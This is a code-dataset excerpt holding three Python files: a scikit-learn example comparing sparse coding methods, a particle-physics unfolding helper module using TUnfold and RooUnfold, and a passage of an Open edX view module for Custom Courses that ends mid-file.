text
stringlengths 12
1.05M
| repo_name
stringlengths 5
86
| path
stringlengths 4
191
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 12
1.05M
| keyword
listlengths 1
23
| text_hash
stringlengths 64
64
|
|---|---|---|---|---|---|---|---|
"""
===========================================
Sparse coding with a precomputed dictionary
===========================================
Transform a signal as a sparse combination of Ricker wavelets. This example
visually compares different sparse coding methods using the
:class:`sklearn.decomposition.SparseCoder` estimator. The Ricker (also known
as Mexican hat or the second derivative of a Gaussian) is not a particularly
good kernel to represent piecewise constant signals like this one. It can
therefore be seen how much adding different widths of atoms matters and it
therefore motivates learning the dictionary to best fit your type of signals.
The richer dictionary on the right is not larger in size, heavier subsampling
is performed in order to stay on the same order of magnitude.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.decomposition import SparseCoder
def ricker_function(resolution, center, width):
"""Discrete sub-sampled Ricker (Mexican hat) wavelet"""
x = np.linspace(0, resolution - 1, resolution)
x = ((2 / ((np.sqrt(3 * width) * np.pi ** 1 / 4)))
* (1 - ((x - center) ** 2 / width ** 2))
* np.exp((-(x - center) ** 2) / (2 * width ** 2)))
return x
def ricker_matrix(width, resolution, n_components):
"""Dictionary of Ricker (Mexican hat) wavelets"""
centers = np.linspace(0, resolution - 1, n_components)
D = np.empty((n_components, resolution))
for i, center in enumerate(centers):
D[i] = ricker_function(resolution, center, width)
D /= np.sqrt(np.sum(D ** 2, axis=1))[:, np.newaxis]
return D
resolution = 1024
subsampling = 3 # subsampling factor
width = 100
n_components = resolution / subsampling
# Compute a wavelet dictionary
D_fixed = ricker_matrix(width=width, resolution=resolution,
n_components=n_components)
D_multi = np.r_[tuple(ricker_matrix(width=w, resolution=resolution,
n_components=np.floor(n_components / 5))
for w in (10, 50, 100, 500, 1000))]
# Generate a signal
y = np.linspace(0, resolution - 1, resolution)
first_quarter = y < resolution / 4
y[first_quarter] = 3.
y[np.logical_not(first_quarter)] = -1.
# List the different sparse coding methods in the following format:
# (title, transform_algorithm, transform_alpha, transform_n_nozero_coefs)
estimators = [('OMP', 'omp', None, 15, 'navy'),
('Lasso', 'lasso_cd', 2, None, 'turquoise'), ]
lw = 2
plt.figure(figsize=(13, 6))
for subplot, (D, title) in enumerate(zip((D_fixed, D_multi),
('fixed width', 'multiple widths'))):
plt.subplot(1, 2, subplot + 1)
plt.title('Sparse coding against %s dictionary' % title)
plt.plot(y, lw=lw, linestyle='--', label='Original signal')
# Do a wavelet approximation
for title, algo, alpha, n_nonzero, color in estimators:
coder = SparseCoder(dictionary=D, transform_n_nonzero_coefs=n_nonzero,
transform_alpha=alpha, transform_algorithm=algo)
x = coder.transform(y.reshape(1, -1))
density = len(np.flatnonzero(x))
x = np.ravel(np.dot(x, D))
squared_error = np.sum((y - x) ** 2)
plt.plot(x, color=color, lw=lw,
label='%s: %s nonzero coefs,\n%.2f error'
% (title, density, squared_error))
# Soft thresholding debiasing
coder = SparseCoder(dictionary=D, transform_algorithm='threshold',
transform_alpha=20)
x = coder.transform(y.reshape(1, -1))
_, idx = np.where(x != 0)
x[0, idx], _, _, _ = np.linalg.lstsq(D[idx, :].T, y)
x = np.ravel(np.dot(x, D))
squared_error = np.sum((y - x) ** 2)
plt.plot(x, color='darkorange', lw=lw,
label='Thresholding w/ debiasing:\n%d nonzero coefs, %.2f error'
% (len(idx), squared_error))
plt.axis('tight')
plt.legend(shadow=False, loc='best')
plt.subplots_adjust(.04, .07, .97, .90, .09, .2)
plt.show()
|
RPGOne/Skynet
|
scikit-learn-0.18.1/examples/decomposition/plot_sparse_coding.py
|
Python
|
bsd-3-clause
| 4,038
|
[
"Gaussian"
] |
3ccd5d38db8a80c4dc83db76588fd7d36ab3c8e6cb947e6ae5d14ba4977b3740
|
try:
import ROOT
except:
pass
import array
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from Unfolder.Histogram import H1D, H2D, plotH1D, plotH2D, plotH1DWithText, plotH2DWithText, plotH1DLines
'''
To be used to scan TUnfold's object to find the optimal tau value for
the regularisation.
'''
def printLcurve(tunfolder, fname):
nScan = 30
tauMin = 0
tauMax = 0
iBest = -1
logTauX = ROOT.TSpline3()
logTauY = ROOT.TSpline3()
lCurve = ROOT.TGraph()
iBest = tunfolder.ScanLcurve(nScan,tauMin,tauMax,lCurve, logTauX, logTauY)
tau = tunfolder.GetTau()
print("With TUnfold: Lcurve scan chose tau =", tau)
c = ROOT.TCanvas()
t = ROOT.Double()
x = ROOT.Double()
y = ROOT.Double()
logTauX.GetKnot(iBest,t,x)
logTauY.GetKnot(iBest,t,y)
bestLcurve = ROOT.TGraph(1, array.array('d',[x]), array.array('d', [y]))
lCurve.Draw("AC")
bestLcurve.SetMarkerColor(ROOT.kRed+2)
bestLcurve.Draw("*")
c.Print(fname)
return tau
'''
Use this to run the TUnfold unfolding method.
For example:
tunfolder = getTUnfolder(f_bkg, f_mig, f_data, regMode = ROOT.TUnfold.kRegModeNone)
# no regularization
#printLcurve(tunfolder, "tunfold_lcurve.png")
tunfolder.DoUnfold(0)
tunfold_mig = H1D(tunfolder.GetOutput("tunfold_result"))
tunfold_result = tunfold_mig/eff
comparePlot([f_data, f_data - f_bkg, truth, tunfold_result], ["Data", "Data - bkg", "Particle-level", "TUnfold"], luminosity*1e-3, True, "fb/GeV", "plotTUnfold.png")
'''
def getTUnfolder(bkg, mig, eff, data, regMode = None, normMode = None):
if regMode == None: regMode = ROOT.TUnfold.kRegModeDerivative
if normMode == None: normMode = ROOT.TUnfold.kEConstraintArea
tunfolder = ROOT.TUnfoldDensity(mig.T().toROOT("tunfold_mig"), ROOT.TUnfold.kHistMapOutputVert, regMode, normMode, ROOT.TUnfoldDensity.kDensityModeeNone)
bkg_noerr = H1D(bkg)
for k in range(0, len(bkg.err)):
bkg_noerr.err[k] = 0
dataBkgSub = data - bkg_noerr
tunfolder.SetInput(dataBkgSub.toROOT("data_minus_bkg"), 0)
return tunfolder
'''
Use this to plot the histograms in listHist with the legends in listLegend.
'''
def comparePlot(listHist, listLegend, f = 1.0, normaliseByBinWidth = True, units = "fb", logy = False, fname = "comparePlot.png"):
fig = plt.figure(figsize=(10, 10))
newListHist = []
for item in listHist:
newListHist.append(f*item)
if normaliseByBinWidth:
newListHist[-1].overBinWidth()
sty = ['rv', 'bo', 'g^', 'mo', 'cv', 'ks']
siz = [14, 12, 10, 8, 6, 4]
c = 0
ymax = 0
ymin = 1e10
for item in newListHist:
ma = np.amax(item.val)
ymax = np.amax([ymax, ma])
mi = np.amin(item.val)
ymin = np.amin([ymin, mi])
plt.errorbar(item.x, item.val, [item.err_dw**0.5, item.err_up**0.5], item.x_err, fmt = sty[c], linewidth=2, label = listLegend[c], markersize=siz[c])
c += 1
plt.legend()
if units != "":
plt.ylabel("Differential cross section ["+units+"]")
else:
plt.ylabel("Events")
plt.xlabel("Observable")
if logy:
plt.ylim([ymin*0.8, ymax*2])
ax = plt.gca()
ax.set_yscale('log')
else:
ax = plt.gca()
ax.set_yscale('linear')
plt.ylim([0, ymax*1.2])
plt.tight_layout()
plt.savefig(fname)
plt.close()
'''
This returns a migration-corrected object from RooUnfold using the D'Agostini unfolding procedure.
Here is an example of how to use it:
dagostini_mig = getDAgostini(bkg, mig, eff, data)
comparePlot([data, data - bkg, truth, dagostini_result], ["Data", "Data - bkg", "Particle-level", "D'Agostini"], luminosity*1e-3, True, "fb/GeV", "plotDAgostini.png")
'''
def getDAgostini(bkg, mig, eff, data, nIter = 1):
reco = (mig.project('y') + bkg).toROOT("reco_rp")
reco.SetDirectory(0)
truth = (mig.project('x')/eff).toROOT("truth_p")
truth.SetDirectory(0)
m = mig.T().toROOT("m")
m.SetDirectory(0)
unf_response = ROOT.RooUnfoldResponse(reco, truth, m)
dataBkgSub = data # - bkg
dd = dataBkgSub.toROOT("dataBkgSub_dagostini")
dd.SetDirectory(0)
dagostini = ROOT.RooUnfoldBayes(unf_response, dd, int(nIter))
dagostini.SetVerbose(-1)
dagostini_hreco = dagostini.Hreco()
dagostini_hreco.SetDirectory(0)
del dagostini
del unf_response
del m
r = H1D(dagostini_hreco)
del dagostini_hreco
return r
'''
Use model to get pseudo-data from toy experiments.
'''
def getDataFromModel(bkg, mig, eff):
truth = mig.project('x')/eff
response_noeff = H2D(mig) # = P(r|t) = Mtr/sum_k=1^Nr Mtk
for i in range(0, mig.shape[0]): # for each truth bin
rsum = 0.0
for j in range(0, mig.shape[1]): # for each reco bin
rsum += mig.val[i, j] # calculate the sum of all reco bins in the same truth bin
for j in range(0, mig.shape[1]): # for each reco bin
response_noeff.val[i, j] = mig.val[i, j]/rsum
data = H1D(bkg) # original bkg histogram is ignored: only used to clone X axis
# simulate background
for j in range(0, len(bkg.val)): # j is the reco bin
bv = bkg.val[j]
if bv < 0: bv = 0
bkgCount = np.random.poisson(bv) # this simulates a counting experiment for the bkg
data.val[j] = bkgCount # overwrite background so that we use a Poisson
data.err[j] = bkgCount
# for each truth bin
for i in range(0, len(truth.val)): # i is the truth bin
trueCount = np.random.poisson(truth.val[i]) # this simulates a counting experiment for the truth
#trueCount = int(truth.val[i]) # dirac delta pdf for the truth distribution
# calculate cumulative response for bin i
# C(k|i) = sum_l=0^k P(r=l|t=i)
C = np.zeros(len(bkg.val))
for k in range(0, len(bkg.val)):
for l in range(0, k+1):
C[k] += response_noeff.val[i, l]
# a uniform random number is between 0 and C[0] with prob. response_noeff.val[i, 0]
# it is between C[0] and C[1] with prob. response_noeff.val[i, 1], etc.
for n in range(0, trueCount): # number of experiments is the count in the truth bin
# simulate efficiency by rejecting events with efficiency eff.val[i]
if np.random.uniform(0, 1) > eff.val[i]:
continue
# find the reco bin using the migration matrix mig
# we know that the probability of getting reco bin j given that we are in truth bin i is:
# P(r=j|t=i) = response_noeff.val[i, j]
# first throw a random number between 0 and 1
rn = np.random.uniform(0, 1)
recoBin = len(bkg.val) - 1 # set it to the last bin
for k in range(0, len(bkg.val)): # loop over reco bins and get where the random number is in the cum. distribution
if rn >= C[k]: # if the random number is bigger than the cum. distribution boundary
# keep going as we are not yet at the boundary
continue
# if the random number is smaller than the cum. dist., we have already crossed the boundary
# stop and set the reco bin
recoBin = k
break
data.val[recoBin] += 1
data.err[recoBin] += 1
return data
'''
Calculate the sum of the bias using only the expected values.
'''
def getBiasFromToys(unfoldFunction, alpha, N, bkg, mig, eff, truth):
fitted = np.zeros((N, len(truth.val)))
#fitted2 = np.zeros((N, len(truth.val)))
bias = np.zeros(len(truth.val))
bias_norm = np.zeros(N)
import sys
for k in range(0, N):
if k % 100 == 0:
print("getBiasFromToys: Throwing toy experiment {0}/{1}\r".format(k, N))
sys.stdout.flush()
pseudo_data = getDataFromModel(bkg, mig, eff)
unfolded = unfoldFunction(alpha, pseudo_data)
fitted[k, :] = (unfolded.val - truth.val)
bias_norm[k] = np.sum(unfolded.val - truth.val)
#fitted2[k, :] = unfolded.val
#if k % 500 == 0 and k > 0:
# f = plt.figure()
# plt.errorbar(truth.x, truth.val, np.sqrt(truth.val), truth.x_err, fmt = "ro", markersize = 10, label = "Truth")
# for l in range(k-10, k):
# plt.errorbar(unfolded.x, fitted2[l, :], np.sqrt(fitted2[l, :]), truth.x_err, fmt = "bv", markersize = 10, label = "Unfolded test %d" % l)
# plt.legend(loc = "upper right")
# plt.show()
# plt.close()
print
# systematic bias
bias_syst = np.mean(np.abs(unfoldFunction(alpha, mig.project('y') + bkg).val - truth.val))
bias = np.mean(fitted, axis = 0)
bias_std = np.std(fitted, axis = 0, ddof = 1)
bias_norm_mean = np.mean(bias_norm)
bias_norm_std = np.std(bias_norm, ddof = 1)
bias_binsum = np.mean(np.abs(bias))
bias_std_binsum = np.mean(bias_std)
bias_chi2 = np.mean(np.power(bias/bias_std, 2))
#print "bias mean = ", np.mean(fitted, axis = 0), ", bias std = ", np.std(fitted, axis = 0)
return [bias_binsum, bias_std_binsum, bias_chi2, bias_norm_mean, bias_norm_std, bias_syst]
'''
Scan general regularization parameter to minimize bias^2 over variance.
unfoldFunction receives the reg. parameter and a data vector to unfold and returns the unfolded spectrum.
'''
def scanRegParameter(unfoldFunction, bkg, mig, eff, truth, N = 1000, rangeAlpha = np.arange(0.0, 1.0, 1e-3), fname = "scanRegParameter.png", fname_chi2 = "scanRegParameter_chi2.png", fname_norm = "scanRegParameter_norm.png"):
bias = np.zeros(len(rangeAlpha))
bias_std = np.zeros(len(rangeAlpha))
bias_chi2 = np.zeros(len(rangeAlpha))
bias_norm = np.zeros(len(rangeAlpha))
bias_norm_std = np.zeros(len(rangeAlpha))
bias_syst = np.zeros(len(rangeAlpha))
minBias = 1e10
bestAlpha = 0
bestChi2 = 0
bestI = 0
import sys
for i in range(0, len(rangeAlpha)):
#if i % 100 == 0:
print("scanRegParameter: parameter = ", rangeAlpha[i], " / ", rangeAlpha[-1])
sys.stdout.flush()
bias[i], bias_std[i], bias_chi2[i], bias_norm[i], bias_norm_std[i], bias_syst[i] = getBiasFromToys(unfoldFunction, rangeAlpha[i], N, bkg, mig, eff, truth)
print(" -- --> scanRegParameter: parameter = ", rangeAlpha[i], " / ", rangeAlpha[-1], " with chi2 = ", bias_chi2[i], ", mean and std = ", bias[i], bias_std[i])
if np.abs(bias_chi2[i] - 0.5) < minBias:
minBias = np.abs(bias_chi2[i] - 0.5)
bestAlpha = rangeAlpha[i]
bestChi2 = bias_chi2[i]
bestI = i
fig = plt.figure(figsize=(10, 10))
plt_bias = H1D(bias)
plt_bias.val = bias
plt_bias.err = np.zeros(len(rangeAlpha))
plt_bias.x = rangeAlpha
plt_bias.x_err = np.zeros(len(rangeAlpha))
plt_bias_e = H1D(bias)
plt_bias_e.val = bias_std
plt_bias_e.err = np.zeros(len(rangeAlpha))
plt_bias_e.x = rangeAlpha
plt_bias_e.x_err = np.zeros(len(rangeAlpha))
plt_bias_syst = H1D(bias)
plt_bias_syst.val = bias_syst
plt_bias_syst.err = np.zeros(len(rangeAlpha))
plt_bias_syst.x = rangeAlpha
plt_bias_syst.x_err = np.zeros(len(rangeAlpha))
#plotH1DLines({r"$E_{\mathrm{bins}}[|E_{\mathrm{toys}}[\mathrm{bias}]|]$": plt_bias, r"$E_{\mathrm{bins}}[\sqrt{\mathrm{Var}_{\mathrm{toys}}[\mathrm{bias}]}]$": plt_bias_e, r"$E_{\mathrm{bins}}[|\mathrm{only \;\; syst. \;\; bias}|]$": plt_bias_syst}, "Regularization parameter", "Bias", "", fname)
plotH1DLines({r"$E_{\mathrm{bins}}[|E_{\mathrm{toys}}[\mathrm{bias}]|]$": plt_bias, r"$E_{\mathrm{bins}}[\sqrt{\mathrm{Var}_{\mathrm{toys}}[\mathrm{bias}]}]$": plt_bias_e}, "Regularization parameter", "Bias", "", fname)
plt_bias_norm = H1D(bias)
plt_bias_norm.val = bias_norm
plt_bias_norm.err = np.power(bias_norm_std, 2)
plt_bias_norm.x = rangeAlpha
plt_bias_norm.x_err = np.zeros(len(rangeAlpha))
plt_bias_norm_e = H1D(bias)
plt_bias_norm_e.val = bias_norm_std
plt_bias_norm_e.err = np.zeros(len(rangeAlpha))
plt_bias_norm_e.x = rangeAlpha
plt_bias_norm_e.x_err = np.zeros(len(rangeAlpha))
plotH1DLines({r"$E_{\mathrm{toys}}[\mathrm{norm. \;\; bias}]$": plt_bias_norm, r"$\sqrt{\mathrm{Var}_{\mathrm{toys}}[\mathrm{norm. \;\; bias}]}$": plt_bias_norm_e}, "Regularization parameter", "Normalisation bias", "", fname_norm)
plt_bias_chi2 = H1D(bias_chi2)
plt_bias_chi2.val = bias_chi2
plt_bias_chi2.err = np.ones(len(rangeAlpha))*np.sqrt(float(len(truth.val))/float(N)) # error in chi^2 considering errors in the mean of std/sqrt(N)
plt_bias_chi2.x = rangeAlpha
plt_bias_chi2.x_err = np.zeros(len(rangeAlpha))
plt_cte = H1D(plt_bias_chi2)
plt_cte.val = 0.5*np.ones(len(rangeAlpha))
plt_cte.err = np.zeros(len(rangeAlpha))
plotH1DLines({r"$E_{\mathrm{bins}}[E_{\mathrm{toys}}[\mathrm{bias}]^2/\mathrm{Var}_{\mathrm{toys}}[\mathrm{bias}]]$": plt_bias_chi2, "0.5": plt_cte}, "Regularisation parameter", r"Bias $\mathrm{mean}^2/\mathrm{variance}$", "", fname_chi2)
return [bestAlpha, bestChi2, bias[bestI], bias_std[bestI], bias_norm[bestI], bias_norm_std[bestI]]
|
daniloefl/Unfolder
|
Unfolder/ComparisonHelpers.py
|
Python
|
gpl-3.0
| 12,462
|
[
"DIRAC"
] |
d163846baed4707df19b064a12c5b5760afdbb9504aa29150e32a2ea4b69ae0e
|
"""
Views related to the Custom Courses feature.
"""
import csv
import datetime
import functools
import json
import logging
from copy import deepcopy
from cStringIO import StringIO
import pytz
from ccx_keys.locator import CCXLocator
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.db import transaction
from django.http import Http404, HttpResponse, HttpResponseForbidden
from django.shortcuts import redirect
from django.utils.translation import ugettext as _
from django.views.decorators.cache import cache_control
from django.views.decorators.csrf import ensure_csrf_cookie
from opaque_keys.edx.keys import CourseKey
from courseware.access import has_access
from courseware.courses import get_course_by_id
from courseware.field_overrides import disable_overrides
from django_comment_common.models import FORUM_ROLE_ADMINISTRATOR, assign_role
from django_comment_common.utils import seed_permissions_roles
from edxmako.shortcuts import render_to_response
from lms.djangoapps.ccx.models import CustomCourseForEdX
from lms.djangoapps.ccx.overrides import (
bulk_delete_ccx_override_fields,
clear_ccx_field_info_from_ccx_map,
get_override_for_ccx,
override_field_for_ccx
)
from lms.djangoapps.ccx.utils import (
add_master_course_staff_to_ccx,
assign_staff_role_to_ccx,
ccx_course,
ccx_students_enrolling_center,
get_ccx_by_ccx_id,
get_ccx_creation_dict,
get_ccx_for_coach,
get_date,
get_enrollment_action_and_identifiers,
parse_date,
)
from lms.djangoapps.grades.course_grade_factory import CourseGradeFactory
from lms.djangoapps.instructor.enrollment import enroll_email, get_email_params
from lms.djangoapps.instructor.views.gradebook_api import get_grade_book_page
from student.models import CourseEnrollment
from student.roles import CourseCcxCoachRole
from xmodule.modulestore.django import SignalHandler
log = logging.getLogger(__name__)
TODAY = datetime.datetime.today # for patching in tests
def coach_dashboard(view):
"""
View decorator which enforces that the user have the CCX coach role on the
given course and goes ahead and translates the course_id from the Django
route into a course object.
"""
@functools.wraps(view)
def wrapper(request, course_id):
"""
Wraps the view function, performing access check, loading the course,
and modifying the view's call signature.
"""
course_key = CourseKey.from_string(course_id)
ccx = None
if isinstance(course_key, CCXLocator):
ccx_id = course_key.ccx
try:
ccx = CustomCourseForEdX.objects.get(pk=ccx_id)
except CustomCourseForEdX.DoesNotExist:
raise Http404
if ccx:
course_key = ccx.course_id
course = get_course_by_id(course_key, depth=None)
if not course.enable_ccx:
raise Http404
else:
is_staff = has_access(request.user, 'staff', course)
is_instructor = has_access(request.user, 'instructor', course)
if is_staff or is_instructor:
# if user is staff or instructor then he can view ccx coach dashboard.
return view(request, course, ccx)
else:
# if there is a ccx, we must validate that it is the ccx for this coach
role = CourseCcxCoachRole(course_key)
if not role.has_user(request.user):
return HttpResponseForbidden(_('You must be a CCX Coach to access this view.'))
elif ccx is not None:
coach_ccx = get_ccx_by_ccx_id(course, request.user, ccx.id)
if coach_ccx is None:
return HttpResponseForbidden(
_('You must be the coach for this ccx to access this view')
)
return view(request, course, ccx)
return wrapper
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def dashboard(request, course, ccx=None):
"""
Display the CCX Coach Dashboard.
"""
# right now, we can only have one ccx per user and course
# so, if no ccx is passed in, we can sefely redirect to that
if ccx is None:
ccx = get_ccx_for_coach(course, request.user)
if ccx:
url = reverse(
'ccx_coach_dashboard',
kwargs={'course_id': CCXLocator.from_course_locator(course.id, unicode(ccx.id))}
)
return redirect(url)
context = {
'course': course,
'ccx': ccx,
}
context.update(get_ccx_creation_dict(course))
if ccx:
ccx_locator = CCXLocator.from_course_locator(course.id, unicode(ccx.id))
# At this point we are done with verification that current user is ccx coach.
assign_staff_role_to_ccx(ccx_locator, request.user, course.id)
schedule = get_ccx_schedule(course, ccx)
grading_policy = get_override_for_ccx(
ccx, course, 'grading_policy', course.grading_policy)
context['schedule'] = json.dumps(schedule, indent=4)
context['save_url'] = reverse(
'save_ccx', kwargs={'course_id': ccx_locator})
context['ccx_members'] = CourseEnrollment.objects.filter(course_id=ccx_locator, is_active=True)
context['gradebook_url'] = reverse(
'ccx_gradebook', kwargs={'course_id': ccx_locator})
context['grades_csv_url'] = reverse(
'ccx_grades_csv', kwargs={'course_id': ccx_locator})
context['grading_policy'] = json.dumps(grading_policy, indent=4)
context['grading_policy_url'] = reverse(
'ccx_set_grading_policy', kwargs={'course_id': ccx_locator})
with ccx_course(ccx_locator) as course:
context['course'] = course
else:
context['create_ccx_url'] = reverse(
'create_ccx', kwargs={'course_id': course.id})
return render_to_response('ccx/coach_dashboard.html', context)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def create_ccx(request, course, ccx=None):
"""
Create a new CCX
"""
name = request.POST.get('name')
if hasattr(course, 'ccx_connector') and course.ccx_connector:
# if ccx connector url is set in course settings then inform user that he can
# only create ccx by using ccx connector url.
context = get_ccx_creation_dict(course)
messages.error(request, context['use_ccx_con_error_message'])
return render_to_response('ccx/coach_dashboard.html', context)
# prevent CCX objects from being created for deprecated course ids.
if course.id.deprecated:
messages.error(request, _(
"You cannot create a CCX from a course using a deprecated id. "
"Please create a rerun of this course in the studio to allow "
"this action."))
url = reverse('ccx_coach_dashboard', kwargs={'course_id': course.id})
return redirect(url)
ccx = CustomCourseForEdX(
course_id=course.id,
coach=request.user,
display_name=name)
ccx.save()
# Make sure start/due are overridden for entire course
start = TODAY().replace(tzinfo=pytz.UTC)
override_field_for_ccx(ccx, course, 'start', start)
override_field_for_ccx(ccx, course, 'due', None)
# Enforce a static limit for the maximum amount of students that can be enrolled
override_field_for_ccx(ccx, course, 'max_student_enrollments_allowed', settings.CCX_MAX_STUDENTS_ALLOWED)
# Hide anything that can show up in the schedule
hidden = 'visible_to_staff_only'
for chapter in course.get_children():
override_field_for_ccx(ccx, chapter, hidden, True)
for sequential in chapter.get_children():
override_field_for_ccx(ccx, sequential, hidden, True)
for vertical in sequential.get_children():
override_field_for_ccx(ccx, vertical, hidden, True)
ccx_id = CCXLocator.from_course_locator(course.id, unicode(ccx.id))
# Create forum roles
seed_permissions_roles(ccx_id)
# Assign administrator forum role to CCX coach
assign_role(ccx_id, request.user, FORUM_ROLE_ADMINISTRATOR)
url = reverse('ccx_coach_dashboard', kwargs={'course_id': ccx_id})
# Enroll the coach in the course
email_params = get_email_params(course, auto_enroll=True, course_key=ccx_id, display_name=ccx.display_name)
enroll_email(
course_id=ccx_id,
student_email=request.user.email,
auto_enroll=True,
email_students=True,
email_params=email_params,
)
assign_staff_role_to_ccx(ccx_id, request.user, course.id)
add_master_course_staff_to_ccx(course, ccx_id, ccx.display_name)
# using CCX object as sender here.
responses = SignalHandler.course_published.send(
sender=ccx,
course_key=CCXLocator.from_course_locator(course.id, unicode(ccx.id))
)
for rec, response in responses:
log.info('Signal fired when course is published. Receiver: %s. Response: %s', rec, response)
return redirect(url)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def save_ccx(request, course, ccx=None):
"""
Save changes to CCX.
"""
if not ccx:
raise Http404
def override_fields(parent, data, graded, earliest=None, ccx_ids_to_delete=None):
"""
Recursively apply CCX schedule data to CCX by overriding the
`visible_to_staff_only`, `start` and `due` fields for units in the
course.
"""
if ccx_ids_to_delete is None:
ccx_ids_to_delete = []
blocks = {
str(child.location): child
for child in parent.get_children()}
for unit in data:
block = blocks[unit['location']]
override_field_for_ccx(
ccx, block, 'visible_to_staff_only', unit['hidden'])
start = parse_date(unit['start'])
if start:
if not earliest or start < earliest:
earliest = start
override_field_for_ccx(ccx, block, 'start', start)
else:
ccx_ids_to_delete.append(get_override_for_ccx(ccx, block, 'start_id'))
clear_ccx_field_info_from_ccx_map(ccx, block, 'start')
# Only subsection (aka sequential) and unit (aka vertical) have due dates.
if 'due' in unit: # checking that the key (due) exist in dict (unit).
due = parse_date(unit['due'])
if due:
override_field_for_ccx(ccx, block, 'due', due)
else:
ccx_ids_to_delete.append(get_override_for_ccx(ccx, block, 'due_id'))
clear_ccx_field_info_from_ccx_map(ccx, block, 'due')
else:
# In case of section aka chapter we do not have due date.
ccx_ids_to_delete.append(get_override_for_ccx(ccx, block, 'due_id'))
clear_ccx_field_info_from_ccx_map(ccx, block, 'due')
if not unit['hidden'] and block.graded:
graded[block.format] = graded.get(block.format, 0) + 1
children = unit.get('children', None)
# For a vertical, override start and due dates of all its problems.
if unit.get('category', None) == u'vertical':
for component in block.get_children():
# override start and due date of problem (Copy dates of vertical into problems)
if start:
override_field_for_ccx(ccx, component, 'start', start)
if due:
override_field_for_ccx(ccx, component, 'due', due)
if children:
override_fields(block, children, graded, earliest, ccx_ids_to_delete)
return earliest, ccx_ids_to_delete
graded = {}
earliest, ccx_ids_to_delete = override_fields(course, json.loads(request.body), graded, [])
bulk_delete_ccx_override_fields(ccx, ccx_ids_to_delete)
if earliest:
override_field_for_ccx(ccx, course, 'start', earliest)
# Attempt to automatically adjust grading policy
changed = False
policy = get_override_for_ccx(
ccx, course, 'grading_policy', course.grading_policy
)
policy = deepcopy(policy)
grader = policy['GRADER']
for section in grader:
count = graded.get(section.get('type'), 0)
if count < section.get('min_count', 0):
changed = True
section['min_count'] = count
if changed:
override_field_for_ccx(ccx, course, 'grading_policy', policy)
# using CCX object as sender here.
responses = SignalHandler.course_published.send(
sender=ccx,
course_key=CCXLocator.from_course_locator(course.id, unicode(ccx.id))
)
for rec, response in responses:
log.info('Signal fired when course is published. Receiver: %s. Response: %s', rec, response)
return HttpResponse(
json.dumps({
'schedule': get_ccx_schedule(course, ccx),
'grading_policy': json.dumps(policy, indent=4)}),
content_type='application/json',
)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def set_grading_policy(request, course, ccx=None):
"""
Set grading policy for the CCX.
"""
if not ccx:
raise Http404
override_field_for_ccx(
ccx, course, 'grading_policy', json.loads(request.POST['policy']))
# using CCX object as sender here.
responses = SignalHandler.course_published.send(
sender=ccx,
course_key=CCXLocator.from_course_locator(course.id, unicode(ccx.id))
)
for rec, response in responses:
log.info('Signal fired when course is published. Receiver: %s. Response: %s', rec, response)
url = reverse(
'ccx_coach_dashboard',
kwargs={'course_id': CCXLocator.from_course_locator(course.id, unicode(ccx.id))}
)
return redirect(url)
def get_ccx_schedule(course, ccx):
"""
Generate a JSON serializable CCX schedule.
"""
def visit(node, depth=1):
"""
Recursive generator function which yields CCX schedule nodes.
We convert dates to string to get them ready for use by the js date
widgets, which use text inputs.
Visits students visible nodes only; nodes children of hidden ones
are skipped as well.
Dates:
Only start date is applicable to a section. If ccx coach did not override start date then
getting it from the master course.
Both start and due dates are applicable to a subsection (aka sequential). If ccx coach did not override
these dates then getting these dates from corresponding subsection in master course.
Unit inherits start date and due date from its subsection. If ccx coach did not override these dates
then getting them from corresponding subsection in master course.
"""
for child in node.get_children():
# in case the children are visible to staff only, skip them
if child.visible_to_staff_only:
continue
hidden = get_override_for_ccx(
ccx, child, 'visible_to_staff_only',
child.visible_to_staff_only)
start = get_date(ccx, child, 'start')
if depth > 1:
# Subsection has both start and due dates and unit inherit dates from their subsections
if depth == 2:
due = get_date(ccx, child, 'due')
elif depth == 3:
# Get start and due date of subsection in case unit has not override dates.
due = get_date(ccx, child, 'due', node)
start = get_date(ccx, child, 'start', node)
visited = {
'location': str(child.location),
'display_name': child.display_name,
'category': child.category,
'start': start,
'due': due,
'hidden': hidden,
}
else:
visited = {
'location': str(child.location),
'display_name': child.display_name,
'category': child.category,
'start': start,
'hidden': hidden,
}
if depth < 3:
children = tuple(visit(child, depth + 1))
if children:
visited['children'] = children
yield visited
else:
yield visited
with disable_overrides():
return tuple(visit(course))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def ccx_schedule(request, course, ccx=None): # pylint: disable=unused-argument
"""
get json representation of ccx schedule
"""
if not ccx:
raise Http404
schedule = get_ccx_schedule(course, ccx)
json_schedule = json.dumps(schedule, indent=4)
return HttpResponse(json_schedule, content_type='application/json')
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def ccx_students_management(request, course, ccx=None):
"""
Manage the enrollment of the students in a CCX
"""
if not ccx:
raise Http404
action, identifiers = get_enrollment_action_and_identifiers(request)
email_students = 'email-students' in request.POST
course_key = CCXLocator.from_course_locator(course.id, unicode(ccx.id))
email_params = get_email_params(course, auto_enroll=True, course_key=course_key, display_name=ccx.display_name)
errors = ccx_students_enrolling_center(action, identifiers, email_students, course_key, email_params, ccx.coach)
for error_message in errors:
messages.error(request, error_message)
url = reverse('ccx_coach_dashboard', kwargs={'course_id': course_key})
return redirect(url)
# Grades can potentially be written - if so, let grading manage the transaction.
@transaction.non_atomic_requests
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def ccx_gradebook(request, course, ccx=None):
"""
Show the gradebook for this CCX.
"""
if not ccx:
raise Http404
ccx_key = CCXLocator.from_course_locator(course.id, unicode(ccx.id))
with ccx_course(ccx_key) as course:
student_info, page = get_grade_book_page(request, course, course_key=ccx_key)
return render_to_response('courseware/gradebook.html', {
'page': page,
'page_url': reverse('ccx_gradebook', kwargs={'course_id': ccx_key}),
'students': student_info,
'course': course,
'course_id': course.id,
